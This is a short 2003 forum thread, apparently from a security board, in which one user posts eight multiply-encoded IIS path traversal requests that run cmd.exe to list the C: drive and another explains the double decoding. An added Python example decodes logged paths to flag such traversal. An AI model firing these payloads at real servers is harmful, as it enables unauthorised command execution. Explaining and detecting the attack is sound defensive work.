soup4you2
June 30th, 2003, 11:45
[code]
/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
[/code]

:)

bsdjunkie
June 30th, 2003, 13:31
Multiple decoding attack against IIS.

%5c = \

%25 = %
%35 = 5
%63 = c

so

/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:

is the same as /..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:

So it's trying to be trickier by encoding the characters again.

etc....



:roll:
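
The layered encoding described in the post above can be flagged when reviewing web server logs by percent-decoding each request path until it stops changing and then checking for `..` segments. This is an added example, not part of the original thread; the function names, verdict labels and `MAX_LAYERS` cap are assumptions chosen for illustration.

```python
from urllib.parse import unquote

MAX_LAYERS = 5  # assumed cap on decode passes, not a value from the thread


def decode_layers(path):
    """Percent-decode until the string stops changing.

    Returns (final_text, passes). unquote() leaves an invalid escape such
    as the bare '%' in '%%35%63' untouched, so that form becomes '%5c'
    after one pass and a backslash after two.
    """
    current, passes = path, 0
    while passes < MAX_LAYERS:
        decoded = unquote(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current, passes


def classify(request):
    """Label one logged request path (the query string is ignored)."""
    final, passes = decode_layers(request.split("?", 1)[0])
    # Treat '\' like '/' so both separator styles are compared the same way.
    segments = final.replace("\\", "/").split("/")
    traversal = ".." in segments
    if traversal and passes >= 2:
        return "traversal-multi-encoded"
    if traversal:
        return "traversal"
    if passes >= 2:
        return "multi-encoded"
    return "ok"


# The first four paths are forms quoted in the thread; the last two are
# constructed benign requests for comparison.
SAMPLES = [
    "/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:",
    "/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:",
    "/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:",
    "/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:",
    "/images/logo%20small.gif",
    "/docs/report%2520final.pdf",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{classify(sample):24} {sample}")
```

A request that needs two or more decode passes is worth a look even without `..` in it, since ordinary clients rarely encode a path twice.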

soup4you2
June 30th, 2003, 13:54
Good job...

Here's the URL for more info about this...

http://neworder.box.sk/newsread_print.php?newsid=8465